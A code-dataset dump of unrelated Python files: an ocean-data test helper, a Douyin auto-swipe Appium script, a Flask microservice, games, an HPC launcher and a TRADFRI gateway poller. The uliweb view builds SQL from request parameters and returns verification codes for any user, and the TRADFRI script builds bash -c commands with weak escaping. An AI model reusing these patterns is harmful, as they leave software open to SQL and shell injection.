numpy.array([])\n for message in results:\n rdt = RecordDictionaryTool.load_from_granule(message)\n if 'salinity' in message.data_producer_id:\n if 'double' in message.data_producer_id:\n bin2 = numpy.append(bin2, rdt['salinity'])\n else:\n bin1 = numpy.append(bin1, rdt['salinity'])\n\n\n\n assert_array_almost_equal(bin2, bin1 * 2.0)\n\n\n\n def validate_data_ingest_retrieve(self, dataset_id):\n\n assertions = self.assertTrue\n\n #validate that data was ingested\n replay_granule = self.data_retriever.retrieve_last_data_points(dataset_id, 10)\n rdt = RecordDictionaryTool.load_from_granule(replay_granule)\n salinity = get_safe(rdt, 'salinity')\n assertions(salinity != None)\n\n #retrieve all the granules from the database and check the values\n replay_granule_all = self.data_retriever.retrieve(dataset_id)\n rdt = RecordDictionaryTool.load_from_granule(replay_granule_all)\n for k, v in rdt.iteritems():\n if k == 'salinity':\n for val in numpy.nditer(v):\n assertions(val > 0)\n\n def create_salinity_data_process_definition(self):\n\n # Salinity: Data Process Definition\n\n #First look to see if it exists and if not, then create it\n dpd,_ = self.rrclient.find_resources(restype=RT.DataProcessDefinition, name='ctd_salinity')\n if len(dpd) > 0:\n return dpd[0]\n\n log.debug(\"Create data process definition SalinityTransform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='ctd_salinity',\n description='create a salinity data product',\n module='ion.processes.data.transforms.ctd.ctd_L2_salinity',\n class_name='SalinityTransform')\n try:\n ctd_L2_salinity_dprocdef_id = self.dataprocessclient.create_data_process_definition(dpd_obj)\n except Exception as ex:\n self.fail(\"failed to create new SalinityTransform data process definition: %s\" %ex)\n\n # create a stream definition for the data from the salinity Transform\n ctd_pdict_id = self.datasetclient.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n sal_stream_def_id = self.pubsubclient.create_stream_definition(name='Salinity', parameter_dictionary_id=ctd_pdict_id)\n self.dataprocessclient.assign_stream_definition_to_data_process_definition(sal_stream_def_id, ctd_L2_salinity_dprocdef_id, binding='salinity' )\n\n return ctd_L2_salinity_dprocdef_id\n\n def create_salinity_doubler_data_process_definition(self):\n\n #First look to see if it exists and if not, then create it\n dpd,_ = self.rrclient.find_resources(restype=RT.DataProcessDefinition, name='salinity_doubler')\n if len(dpd) > 0:\n return dpd[0]\n\n # Salinity Doubler: Data Process Definition\n log.debug(\"Create data process definition SalinityDoublerTransform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='salinity_doubler',\n description='create a salinity doubler data product',\n module='ion.processes.data.transforms.example_double_salinity',\n class_name='SalinityDoubler')\n try:\n salinity_doubler_dprocdef_id = self.dataprocessclient.create_data_process_definition(dpd_obj)\n except Exception as ex:\n self.fail(\"failed to create new SalinityDoubler data process definition: %s\" %ex)\n\n\n # create a stream definition for the data from the salinity Transform\n ctd_pdict_id = self.datasetclient.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n salinity_double_stream_def_id = self.pubsubclient.create_stream_definition(name='SalinityDoubler', parameter_dictionary_id=ctd_pdict_id)\n self.dataprocessclient.assign_stream_definition_to_data_process_definition(salinity_double_stream_def_id, salinity_doubler_dprocdef_id, binding='salinity' )\n\n return salinity_doubler_dprocdef_id\n\n\n def create_transform_process(self, data_process_definition_id, data_process_input_dp_id, stream_name):\n\n data_process_definition = self.rrclient.read(data_process_definition_id)\n\n # Find the link between the output Stream Definition resource and the Data Process Definition resource\n stream_ids,_ = self.rrclient.find_objects(data_process_definition._id, PRED.hasStreamDefinition, RT.StreamDefinition, id_only=True)\n if not stream_ids:\n raise Inconsistent(\"The data process definition %s is missing an association to an output stream definition\" % data_process_definition._id )\n process_output_stream_def_id = stream_ids[0]\n\n #Concatenate the name of the workflow and data process definition for the name of the data product output\n data_process_name = data_process_definition.name\n\n # Create the output data product of the transform\n\n tdom, sdom = time_series_domain()\n\n transform_dp_obj = IonObject(RT.DataProduct,\n name=data_process_name,\n description=data_process_definition.description,\n temporal_domain = tdom.dump(),\n spatial_domain = sdom.dump())\n\n transform_dp_id = self.dataproductclient.create_data_product(transform_dp_obj, process_output_stream_def_id)\n\n self.dataproductclient.activate_data_product_persistence(data_product_id=transform_dp_id)\n\n #last one out of the for loop is the output product id\n output_data_product_id = transform_dp_id\n\n # Create the transform data process\n log.debug(\"create data_process and start it\")\n data_process_id = self.dataprocessclient.create_data_process(\n data_process_definition_id = data_process_definition._id,\n in_data_product_ids = [data_process_input_dp_id],\n out_data_product_ids = [transform_dp_id])\n\n self.dataprocessclient.activate_data_process(data_process_id)\n\n\n #Find the id of the output data stream\n stream_ids, _ = self.rrclient.find_objects(transform_dp_id, PRED.hasStream, None, True)\n if not stream_ids:\n raise Inconsistent(\"The data process %s is missing an association to an output stream\" % data_process_id )\n\n return data_process_id, output_data_product_id\n\n\n\n def create_highcharts_data_process_definition(self):\n return helper_create_highcharts_data_process_definition(self.container)\n\n\n def validate_highcharts_transform_results(self, results):\n\n assertions = self.assertTrue\n\n # if its just one granule, wrap it up in a list so we can use the following for loop for a couple of cases\n if isinstance(results,Granule):\n results =[results]\n\n for g in results:\n\n if isinstance(g,Granule):\n\n rdt = RecordDictionaryTool.load_from_granule(g)\n hc_data_arr = get_safe(rdt, 'hc_data')\n\n if hc_data_arr == None:\n log.debug(\"hc_data in granule is None\")\n continue\n\n assertions(len(hc_data_arr) >= 0) # Need to come up with a better check\n\n hc_data = hc_data_arr[0]\n assertions(len(hc_data) >= 0)\n\n assertions(len(hc_data[0][\"name\"]) >= 0)\n assertions(len(hc_data[0][\"data\"]) >= 0)\n\n\n\n def create_mpl_graphs_data_process_definition(self):\n\n #First look to see if it exists and if not, then create it\n dpd,_ = self.rrclient.find_resources(restype=RT.DataProcessDefinition, name='mpl_graphs_transform')\n if len(dpd) > 0:\n return dpd[0]\n\n #Data Process Definition\n log.debug(\"Create data process definition MatplotlibGraphsTransform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='mpl_graphs_transform',\n description='Convert data streams to Matplotlib graphs',\n module='ion.processes.data.transforms.viz.matplotlib_graphs',\n class_name='VizTransformMatplotlibGraphs')\n try:\n procdef_id = self.dataprocessclient.create_data_process_definition(dpd_obj)\n except Exception as ex:\n self.fail(\"failed to create new VizTransformMatplotlibGraphs data process definition: %s\" %ex)\n\n\n pdict_id = self.datasetclient.read_parameter_dictionary_by_name('graph_image_param_dict',id_only=True)\n # create a stream definition for the data\n stream_def_id = self.pubsubclient.create_stream_definition(name='VizTransformMatplotlibGraphs', parameter_dictionary_id=pdict_id)\n self.dataprocessclient.assign_stream_definition_to_data_process_definition(stream_def_id, procdef_id, binding='graph_image_param_dict' )\n\n return procdef_id\n\n def validate_mpl_graphs_transform_results(self, results):\n\n cc = self.container\n assertions = self.assertTrue\n\n # if its just one granule, wrap it up in a list so we can use the following for loop for a couple of cases\n if isinstance(results,Granule):\n results =[results]\n\n found_data = False\n for g in results:\n if isinstance(g,Granule):\n rdt = RecordDictionaryTool.load_from_granule(g)\n\n graphs = get_safe(rdt, 'matplotlib_graphs')\n\n if graphs == None:\n continue\n\n for graph in graphs[0]:\n\n # At this point only dictionaries containing image data should be passed\n # For some reason non dictionary values are filtering through.\n if not isinstance(graph, dict):\n continue\n\n assertions(graph['viz_product_type'] == 'matplotlib_graphs' )\n # check to see if the list (numpy array) contains actual images\n assertions(imghdr.what(graph['image_name'], h = graph['image_obj']) == 'png')\n found_data = True\n return found_data\n\n\n\n def validate_vis_service_highcharts_results(self, results):\n\n assertions = self.assertTrue\n assertions(results)\n\n hc_data = simplejson.loads(results)\n\n for series in hc_data:\n assertions(series[\"name\"])\n assertions(series[\"data\"])\n\n return\n\n def validate_vis_service_mpl_graphs_results(self, results_str):\n\n # convert incoming string to dict\n results = ast.literal_eval(results_str)\n\n assertions = self.assertTrue\n assertions(results)\n\n # check to see if the object passed is a dictionary with a valid image object in it\n image_format = results[\"content_type\"].lstrip(\"image/\")\n\n assertions(imghdr.what(results['image_name'], h = base64.decodestring(results['image_obj'])) == image_format)\n\n return\n\n def validate_multiple_vis_queue_messages(self, msg1, msg2):\n\n assertions = self.assertTrue\n\n # verify that the salinity in msg2 is a result of content from msg1\n rdt1 = RecordDictionaryTool.load_from_granule(msg1)\n rdt2 = RecordDictionaryTool.load_from_granule(msg2)\n\n # msg1 should not have salinity\n # assertions(rdt1['salinity'] == None)\n\n conductivity = rdt1['conductivity']\n pressure = rdt1['pressure']\n temperature = rdt1['temp']\n\n msg1_sal_value = SP_from_cndr(r=conductivity/cte.C3515, t=temperature, p=pressure)\n msg2_sal_value = rdt2['salinity']\n b = msg1_sal_value == msg2_sal_value\n\n if isinstance(b,bool):\n assertions(b)\n else:\n assertions(b.all())\n\n return\n\n def create_highcharts_workflow_def(self):\n\n return helper_create_highcharts_workflow_def(self.container)\n\n\n\ndef helper_create_highcharts_data_process_definition(container):\n\n from interface.services.coi.iresource_registry_service import ResourceRegistryServiceClient\n rrclient = ResourceRegistryServiceClient(node=container.node)\n\n #First look to see if it exists and if not, then create it\n dpd,_ = rrclient.find_resources(restype=RT.DataProcessDefinition, name='highcharts_transform')\n if len(dpd) > 0:\n return dpd[0]\n\n # Data Process Definition\n log.debug(\"Create data process definition for highcharts transform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='highcharts_transform',\n description='Convert data streams to Highcharts data',\n module='ion.processes.data.transforms.viz.highcharts',\n class_name='VizTransformHighCharts')\n\n from interface.services.sa.idata_process_management_service import DataProcessManagementServiceClient\n dataprocessclient = DataProcessManagementServiceClient(node=container.node)\n\n procdef_id = dataprocessclient.create_data_process_definition(dpd_obj)\n\n from interface.services.dm.idataset_management_service import DatasetManagementServiceClient\n datasetclient = DatasetManagementServiceClient(node=container.node)\n\n pdict_id = datasetclient.read_parameter_dictionary_by_name('highcharts', id_only=True)\n\n from interface.services.dm.ipubsub_management_service import PubsubManagementServiceClient\n pubsubclient = PubsubManagementServiceClient(node=container.node)\n\n # create a stream definition for the data from the\n stream_def_id = pubsubclient.create_stream_definition(name='VizTransformHighCharts', parameter_dictionary_id=pdict_id)\n dataprocessclient.assign_stream_definition_to_data_process_definition(stream_def_id, procdef_id, binding='highcharts' )\n\n return procdef_id\n\n\ndef helper_create_highcharts_workflow_def(container):\n\n from interface.services.coi.iresource_registry_service import ResourceRegistryServiceClient\n rrclient = ResourceRegistryServiceClient(node=container.node)\n\n # Check to see if the workflow defnition already exist\n workflow_def_ids,_ = rrclient.find_resources(restype=RT.WorkflowDefinition, name='Realtime_HighCharts', id_only=True)\n\n if len(workflow_def_ids) > 0:\n workflow_def_id = workflow_def_ids[0]\n else:\n # Build the workflow definition\n workflow_def_obj = IonObject(RT.WorkflowDefinition, name='Realtime_HighCharts',description='Convert stream data to HighCharts data')\n\n #Add a transformation process definition\n procdef_id = helper_create_highcharts_data_process_definition(container)\n workflow_step_obj = IonObject('DataProcessWorkflowStep', data_process_definition_id=procdef_id)\n workflow_def_obj.workflow_steps.append(workflow_step_obj)\n\n #Create it in the resource registry\n from interface.services.ans.iworkflow_management_service import WorkflowManagementServiceClient\n workflowclient = WorkflowManagementServiceClient(node=container.node)\n\n workflow_def_id = workflowclient.create_workflow_definition(workflow_def_obj)\n\n return workflow_def_id\n\n\ndef preload_ion_params(container):\n\n log.info(\"Preloading ...\")\n # load_parameter_scenarios\n container.spawn_process(\"Loader\", \"ion.processes.bootstrap.ion_loader\", \"IONLoader\", config=dict(\n op=\"load\",\n scenario=\"BETA\",\n #path=\"master\",\n path=\"https://docs.google.com/spreadsheet/pub?key=0ArYknstLVPe7dDZleTRRZzVfaFowSEpzaGVLTU9hUnc&output=xls\",\n categories=\"ParameterFunctions,ParameterDefs,ParameterDictionary,StreamDefinition,DataProcessDefinition,WorkflowDefinition\",\n clearcols=\"owner_id,org_ids\",\n #assets=\"res/preload/r2_ioc/ooi_assets\",\n parseooi=\"True\",\n ))","sub_path":"ion/services/ans/test/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":22177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"208397484","text":"from appium import webdriver\nimport time\n# import datetime\n\n\n\nserver = \"http://localhost:4723/wd/hub\"\nparam = {\n \"deviceName\": \"127.0.0.1:62001\",\n \"platformName\": \"Android\",\n \"platformVersion\": \"7.1.2\",\n \"appPackage\": \"com.ss.android.ugc.aweme\",\n \"appActivity\": \"com.ss.android.ugc.aweme.splash.SplashActivity\"\n}\ndriver = webdriver.Remote(server,param)\n\ntime.sleep(5)\ndriver.find_element_by_id(\"com.ss.android.ugc.aweme:id/bdb\").click()\n\ntime.sleep(1)\ndriver.find_element_by_id(\"com.android.packageinstaller:id/permission_allow_button\").click()\ntime.sleep(1)\ndriver.find_element_by_id(\"com.android.packageinstaller:id/permission_allow_button\").click()\ntime.sleep(1)\nfor i in range(10):\n# while True:\n\n driver.swipe(500, 1200, 500, 400, 300)\n time.sleep(3)\n\n # currenttime = datetime.datetime.now()\n\n # if str(currenttime)[:-7] == '2021-07-05 16:50:00':\n # break\n\n\ndriver.quit()","sub_path":"摸鱼.py","file_name":"摸鱼.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"1109610","text":"# This microservice handles all the track description update specific information\n# * New API calls:\n# - POST /api/users/settrackdesc change description of a track, input data { \"trackurl\": \"track123\",\"username\": \"bony2018\", \"description\": \"My favourite track1!\"}\n# Note if trackurl and username combo not exists it will insert, otherwise it will update the description\n# - GET /api/users/gettrackdesc/<string:username>/<string:trackurl> to retrieve a track description of specific user , input username and trackurl in the API url\n\n\nimport sys\nimport flask_api\nfrom flask import request\nfrom flask_api import status, exceptions\nimport pugsql\nimport base64, hashlib, bcrypt, os, sys\n\n\napp = flask_api.FlaskAPI(__name__)\napp.config.from_envvar('APP_CONFIG')\n\nqueries = pugsql.module('queries/')\nqueries.connect(app.config['DATABASE_URL'])\n\n\n@app.cli.command('init')\n#Initialize the database\ndef init_db():\n with app.app_context():\n db = queries._engine.raw_connection()\n with app.open_resource('tracks.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = queries._engine.raw_connection()\n db.close()\n\n#Base url\n@app.route('/', methods=['GET'])\ndef home():\n return '''<h1>Tracks description microservice running</h1>\n<p>A prototype API for musiclist of users.</p>'''\n\n\n#Set a tracks description if not present. Also, if description already present update it\n@app.route('/api/users/settrackdesc', methods=['GET','POST'])\ndef track_ops():\n if request.method == 'POST':\n return create_desc(request.data)\n return {\"status\":status.HTTP_200_OK},status.HTTP_200_OK\n\n#Update or create description of track\ndef create_desc(track):\n track = request.data\n required_fields = ['trackurl','description','username']\n if not all([field in track for field in required_fields]):\n raise exceptions.ParseError()\n try:\n username = request.data.get('username')\n trackurl = request.data.get('trackurl')\n description=request.data.get('description')\n if (trackurl==\"\"):\n return { 'error': \"Invalid trackurl!\" },status.HTTP_400_BAD_REQUEST\n\n valid=queries.user_by_id(id=username)\n trackid=queries.fetch_track_id(trackurl=trackurl,username=username)\n print(trackid,trackurl,username,description)\n if (valid):\n if (trackid):\n queries.update_track(username=username,trackurl=trackurl,description=description)\n return {\"Success\":status.HTTP_202_ACCEPTED},status.HTTP_202_ACCEPTED\n else:\n queries.insert_track(trackurl=trackurl,username=username,description=description)\n\n else:\n return {track['username']:\" Does not exists\"},status.HTTP_409_CONFLICT\n except Exception as e:\n return { 'error': str(e) }, status.HTTP_409_CONFLICT\n return {track['trackurl']:status.HTTP_201_CREATED},status.HTTP_201_CREATED\n\n#Get a track specific URL.\n@app.route('/api/users/gettrackdesc/<string:username>/<string:trackurl>', methods=['GET'])\ndef track_ret(username,trackurl):\n track_desc=queries.fetch_track(trackurl=trackurl,username=username)\n if(track_desc!=None):\n return {trackurl:track_desc},status.HTTP_200_OK\n else:\n return {trackurl:\"Do not exists\"},status.HTTP_400_BAD_REQUEST\n","sub_path":"Microservices/desc.py","file_name":"desc.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"429682450","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk\n\nfrom board import Board\nfrom sidebar import Sidebar\n\nclass GameWindow(Gtk.Window):\n\n def __init__(self, maze, players):\n Gtk.Window.__init__(self, title = \"Maze\")\n self.set_border_width(20)\n \n self.players = players\n\n self.box = Gtk.Box(orientation = Gtk.Orientation.VERTICAL, spacing = 20)\n self.add(self.box)\n \n self.sidebar = Sidebar(self.players)\n self.box.pack_start(self.sidebar, True, True, 0)\n\n self.board = Board(maze, self.players, self)\n self.box.pack_start(self.board, True, True, 0)\n\n self.connect(\"key-press-event\", self.press)\n\n def press(self, widget, event):\n keyval = event.keyval\n keyval_name = Gdk.keyval_name(keyval)\n state = event.state\n\n if keyval_name == \"w\":\n self.board.move(\"Up\", self.players[0])\n if keyval_name == \"a\":\n self.board.move(\"Left\", self.players[0])\n if keyval_name == \"s\":\n self.board.move(\"Down\", self.players[0])\n if keyval_name == \"d\":\n self.board.move(\"Right\", self.players[0])\n\n if keyval_name in [\"Up\", \"Down\", \"Left\", \"Right\"]:\n self.board.move(keyval_name, self.players[1])\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"150027262","text":"from lbann.contrib.nersc.systems import *\nimport lbann.launcher\nfrom lbann.util import make_iterable\nfrom math import ceil\n\ndef make_batch_script(\n system=system(),\n procs_per_node=procs_per_node(),\n scheduler=scheduler(),\n launcher_args=[],\n environment={},\n *args,\n **kwargs,\n):\n \"\"\"Construct batch script manager with NERSC-specific optimizations.\n\n This is a wrapper around `lbann.launcher.make_batch_script`, with\n defaults and optimizations for NERSC systems. See that function for a\n full list of options.\n\n \"\"\"\n\n # Create shallow copies of input arguments\n launcher_args = list(make_iterable(launcher_args))\n environment = environment.copy()\n\n if system == CORI_GPU:\n cores_per_proc = cores_per_node(system) // procs_per_node\n if 'AL_PROGRESS_RANKS_PER_NUMA_NODE' not in environment:\n environment['AL_PROGRESS_RANKS_PER_NUMA_NODE'] = ceil(procs_per_node / numa_nodes_per_node(system))\n if 'OMP_NUM_THREADS' not in environment:\n environment['OMP_NUM_THREADS'] = cores_per_proc - 1\n if scheduler == 'slurm':\n masks = [2**cores_per_proc - 1]\n while len(masks) < procs_per_node:\n masks.append(masks[-1] << cores_per_proc)\n mask_str = ','.join([hex(mask) for mask in masks])\n launcher_args.append('--cpu_bind=mask_cpu:{}'.format(mask_str))\n\n launcher_args.extend(['--qos=regular',\n f'--cpus-per-task={cores_per_proc}',\n '--gpus-per-task=1',\n '--constraint=gpu'])\n\n # Hack to enable process forking\n # Note: InfiniBand is known to experience hangs if an MPI\n # process is forked (see\n # https://www.open-mpi.org/faq/?category=openfabrics#ofa-fork).\n # Setting IBV_FORK_SAFE seems to fix this issue, but it may\n # hurt performance (see\n # https://linux.die.net/man/3/ibv_fork_init).\n if 'IBV_FORK_SAFE' not in environment:\n environment['IBV_FORK_SAFE'] = 1\n\n if 'MV2_ENABLE_AFFINITY' not in environment:\n environment['MV2_ENABLE_AFFINITY'] = 0\n\n if 'MV2_USE_CUDA' not in environment:\n environment['MV2_USE_CUDA'] = 1\n\n if 'MKL_THREADING_LAYER' not in environment:\n environment['MKL_THREADING_LAYER'] = 'GNU'\n\n return lbann.launcher.make_batch_script(\n procs_per_node=procs_per_node,\n scheduler=scheduler,\n launcher_args=launcher_args,\n environment=environment,\n *args,\n **kwargs,\n )\n","sub_path":"python/lbann/contrib/nersc/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"169947447","text":"#coding=utf-8\n\nfrom uliweb import expose, functions, settings\nfrom forms import getcodeForm\n\n@expose('/')\ndef index():\n return {}\n\n@expose('/echart')\ndef echart():\n ews_tasks=functions.get_model('ews_task').all().count()\n ews_interfaces=functions.get_model('ews_interface').all().count()\n interface_cases=functions.get_model('interface_case').all().count()\n wikipages=functions.get_model('wikipage').all().count()\n task_log=functions.get_model('task_log')\n tl=task_log.all().order_by(task_log.c.id.desc())\n\n list=[]\n legend=[]\n category=[]#任务列表\n data=[]#任务最近1次通过列表\n series=[]\n \n s={\n 'name':'',\n 'type':'line',\n 'data':data,\n 'markPoint' : {\n 'data' : [\n #{'type' : 'max', 'name': '最大值'},\n {'type' : 'min', 'name': '最小值'}\n ]\n },\n 'markLine' : {\n 'data' : [\n #{'type' : 'average', 'name': '平均值'}\n ]\n }\n \n }\n \n rate= {\n 'legend':legend,\n 'category' : category,\n 'series' :series\n }\n \n sum= {\n 'legend':['总量'],\n 'category' : ['0','任务数','接口数','用例数','wiki数'],\n 'series' :[\n {\n 'name':'总量',\n 'type':'bar',\n 'barWidth': '20',\n 'data':[0,ews_tasks, ews_interfaces, interface_cases, wikipages-1]\n \n }\n ]\n }\n \n for t in tl:\n if t.task not in category and t.flag==u'成功':\n category.append(t.task)\n data.append(t.rate)\n series.append(s)\n \n \n \n list.append(rate)\n list.append(sum)\n return json(list)\n\n\n@expose('/getcode')\ndef getcode():\n form=getcodeForm()\n mobile=request.params.get('mobile')\n username=request.params.get('username')\n if mobile ==None and username ==None:\n return {'code':0,'form':form}\n \n from project_autotest import redis_con,oracle_db\n import datetime\n \n redis_con=redis_con.redis_s()\n list_tag=redis_con.list_tag\n\n for tag in list_tag:\n code=redis_con.get_code(tag,username,mobile)\n if code:\n break\n \n if not code:\n code=redis_con.get_reg_code(mobile)\n\n if not code:\n if mobile:\n field=mobile\n else:\n field=username\n try:\n cmd=\"select f_content,f_date from t_userservicesendlog where (f_username='%s' or f_to='%s') order by f_date desc\"%(field,field)\n con=oracle_db.Oracle('sns','LOCTEST')\n s=con.execsql(cmd)\n now=datetime.datetime.today()\n delta=now-s[1]\n if delta < datetime.timedelta(minutes=15):\n code=s[0]\n except:\n pass\n \n return {'code':code,'form':form}\n\n\n","sub_path":"apps/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"18125502","text":"import pygame.font\nfrom pygame.sprite import Group\nfrom remain_ship import RemainShip\n\nclass Scoreboard():\n def __init__(self,ai_settings, screen, stats):\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.ai_settings = ai_settings\n self.stats = stats\n \n self.text_color = (255, 215, 0)\n self.font = pygame.font.SysFont(None, 30)\n \n self.prep_score()\n self.prep_high_score()\n self.prep_level()\n self.prep_remain_ships()\n \n def prep_score(self):\n rounded_score = round(self.stats.score, -1)\n score_str = 'Sco: ' + \"{:,}\".format(rounded_score)\n self.score_image = self.font.render(score_str, True, self.text_color, self.ai_settings.bg_color)\n \n self.score_rect = self.score_image.get_rect()\n self.score_rect.right = self.screen_rect.right - 20\n self.score_rect.top = 20\n \n def prep_high_score(self):\n high_score = int(round(self.stats.high_score, -1))\n high_score_str ='Max: ' + \"{:,}\".format(high_score)\n self.high_score_image = self.font.render(high_score_str, True, self.text_color, self.ai_settings.bg_color)\n \n self.high_score_rect = self.high_score_image.get_rect()\n self.high_score_rect.right = self.screen_rect.right - 400\n self.high_score_rect.top = 20\n \n def prep_level(self):\n self.level_str = 'Level: ' + str(self.stats.level)\n self.level_image = self.font.render(self.level_str, True, self.text_color, self.ai_settings.bg_color)\n \n self.level_image_rect = self.level_image.get_rect()\n self.level_image_rect.centerx = self.screen_rect.centerx - 200\n self.level_image_rect.top = 20\n \n def prep_remain_ships(self):\n self.remain_ships = Group()\n for ship_number in range(self.stats.ships_left):\n remain_ship = RemainShip(self.screen)\n remain_ship.rect.x = 10 + ship_number * remain_ship.rect.width\n remain_ship.rect.y = 10\n self.remain_ships.add(remain_ship)\n \n def show_score(self):\n self.screen.blit(self.score_image, self.score_rect)\n self.screen.blit(self.high_score_image, self.high_score_rect)\n self.screen.blit(self.level_image, self.level_image_rect)\n self.remain_ships.draw(self.screen)","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"343334721","text":"TIMER_ID = \"wirehome.tradfri.gateway_manager.poll_thread\"\n\nconfig = {}\n\nfrom time import sleep\nimport sys\n\n\ndef initialize():\n # wirehome.debugger.enable()\n\n global _devices, _gateway_is_connected\n _devices = {}\n _gateway_is_connected = False\n\n\ndef start():\n wirehome.scheduler.start_timer(TIMER_ID, 2000, __poll_status__)\n\n\ndef stop():\n wirehome.scheduler.stop_timer(TIMER_ID)\n\n\ndef get_debug_infomation(_):\n return {\n \"devices\": _devices,\n \"trace\": wirehome.debugger.get_trace(),\n \"gateway_is_connected\": _gateway_is_connected\n }\n\n\ndef __find_device_id__(caption):\n for device_uid in _devices:\n if _devices[device_uid][\"9001\"] == caption:\n return int(device_uid)\n\n return None\n\n\ndef set_device_status(status):\n device_id = status.get(\"device_id\", None)\n if device_id == None:\n device_caption = status.get(\"device_id\", None)\n device_id = __find_device_id__(device_caption)\n\n if device_id == None:\n return {\"type\": \"exception.parameter_invalid\", \"parameter_name\": \"device_id\"}\n\n power_state = status.get(\"power_state\", 0)\n brightness = status.get(\"brightness\", 245)\n color = status.get(\"color\", \"ffffff\")\n\n uri = \"15001/\" + str(device_id)\n data = {\"5850\": power_state}\n\n # Do not add other values if power is off. Otherwise the device will go on and off\n # e.g when chaning the brightness while the device is off.\n if power_state == 1:\n data[\"5851\"] = brightness\n data[\"5706\"] = color\n\n data = {\"3311\": [data]}\n\n payload = wirehome.json_serializer.serialize(data)\n\n return __execute_coap_request__(\"put\", uri, payload)\n\n\ndef __poll_status__(_):\n global _gateway_is_connected, _devices\n\n response = None\n try:\n new_devices = {}\n\n response = __execute_coap_request__(\"get\", \"15001\")\n device_ids = response[\"output_data\"]\n device_ids = wirehome.json_serializer.deserialize(device_ids)\n\n for device_id in device_ids:\n response = __execute_coap_request__(\"get\", \"15001/\" + str(device_id))\n new_devices[device_id] = wirehome.json_serializer.deserialize(response[\"output_data\"])\n\n _gateway_is_connected = True\n __fire_events__(_devices, new_devices)\n _devices = new_devices\n except:\n _gateway_is_connected = False\n print(\"TRADFRI gateway pull failed. (Response=\" + str(response) + \")\")\n sleep(10)\n raise\n\n\ndef __fire_events__(old, new):\n if old == None or new == None:\n return\n\n for device_id in new:\n old_power_state = __get_device_status_value__(old, device_id, \"5850\")\n new_power_state = __get_device_status_value__(new, device_id, \"5850\")\n if old_power_state != new_power_state:\n wirehome.message_bus.publish({\n \"type\": \"tradfri.gateway_manager.event.device_state_changed\",\n \"device_id\": device_id,\n \"property\": \"power_state\",\n \"old_state\": \"on\" if old_power_state == 1 else \"off\",\n \"new_state\": \"on\" if new_power_state == 1 else \"off\"\n })\n\n old_brightness = __get_device_status_value__(old, device_id, \"5851\")\n new_brightness = __get_device_status_value__(new, device_id, \"5851\")\n if old_brightness != new_brightness:\n wirehome.message_bus.publish({\n \"type\": \"tradfri.gateway_manager.event.device_state_changed\",\n \"device_id\": device_id,\n \"property\": \"brightness\",\n \"old_state\": old_brightness,\n \"new_state\": new_brightness\n })\n\n old_color = __get_device_status_value__(old, device_id, \"5706\")\n new_color = __get_device_status_value__(new, device_id, \"5706\")\n if old_color != new_color:\n wirehome.message_bus.publish({\n \"type\": \"tradfri.gateway_manager.event.device_state_changed\",\n \"device_id\": device_id,\n \"property\": \"color\",\n \"old_state\": old_color,\n \"new_state\": new_color\n })\n\n\ndef __get_device_status_value__(source, device_id, status_id):\n device = source.get(device_id, None)\n if device == None:\n return None\n\n status = device.get(\"3311\", None)\n if status == None:\n return None\n\n if not isinstance(status, list):\n return None\n\n if len(status) != 1:\n return None\n\n status = status[0]\n\n return status.get(status_id, None)\n\n\ndef __execute_coap_request__(method, uri, payload=\"\"):\n address = config.get(\"gateway_address\", None)\n identity = config.get(\"identity\", \"wirehome\")\n psk = config.get(\"psk\", None)\n\n uri = \"coaps://{a}:5684/{u}\".format(a=address, u=uri)\n\n escapedPayload = payload.replace('\"', '\"\"')\n arguments = '-c \"coap-client -m {} -u \"{}\" -k \"{}\" -e \\'{}\\' \"{}\"\"'.format(\n method,\n identity,\n psk,\n escapedPayload,\n uri)\n\n wirehome.debugger.trace(arguments)\n\n parameters = {\n \"file_name\": \"/bin/bash\",\n \"arguments\": arguments,\n \"timeout\": 1000\n }\n\n execute_result = wirehome.os.execute(parameters)\n execute_result[\"arguments\"] = arguments\n\n return execute_result\n","sub_path":"wirehome.services.tradfri.gateway_manager/1.0.0/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"215777427","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nclass ArimaForecasting():\n def arimaForecasting(self):\n dataset = pd.read_csv(\"/home/fidel/Downloads/AirPassengers.csv\", infer_datetime_format=True, header=0, delimiter=\",\")\n # print (dataset.columns['Profit'])\n # print dataset.dtypes\n\n # print datasetExtracted.dtypes\n # print datasetExtracted\n indexColm=\"Month\"\n targetColm=\"#Passengers\"\n dataset = dataset.filter([indexColm,targetColm])\n indexedDataset = dataset.set_index([indexColm])\n print (indexedDataset)\n\n # plt.xlabel(\"Date\")\n # plt.ylabel(\"Freight\")\n # plt.plot(indexedDataset)\n # plt.show()\n\n import datetime\n\n # calculating the rolling mean and std\n rolmean = indexedDataset.rolling(window=12).mean()\n 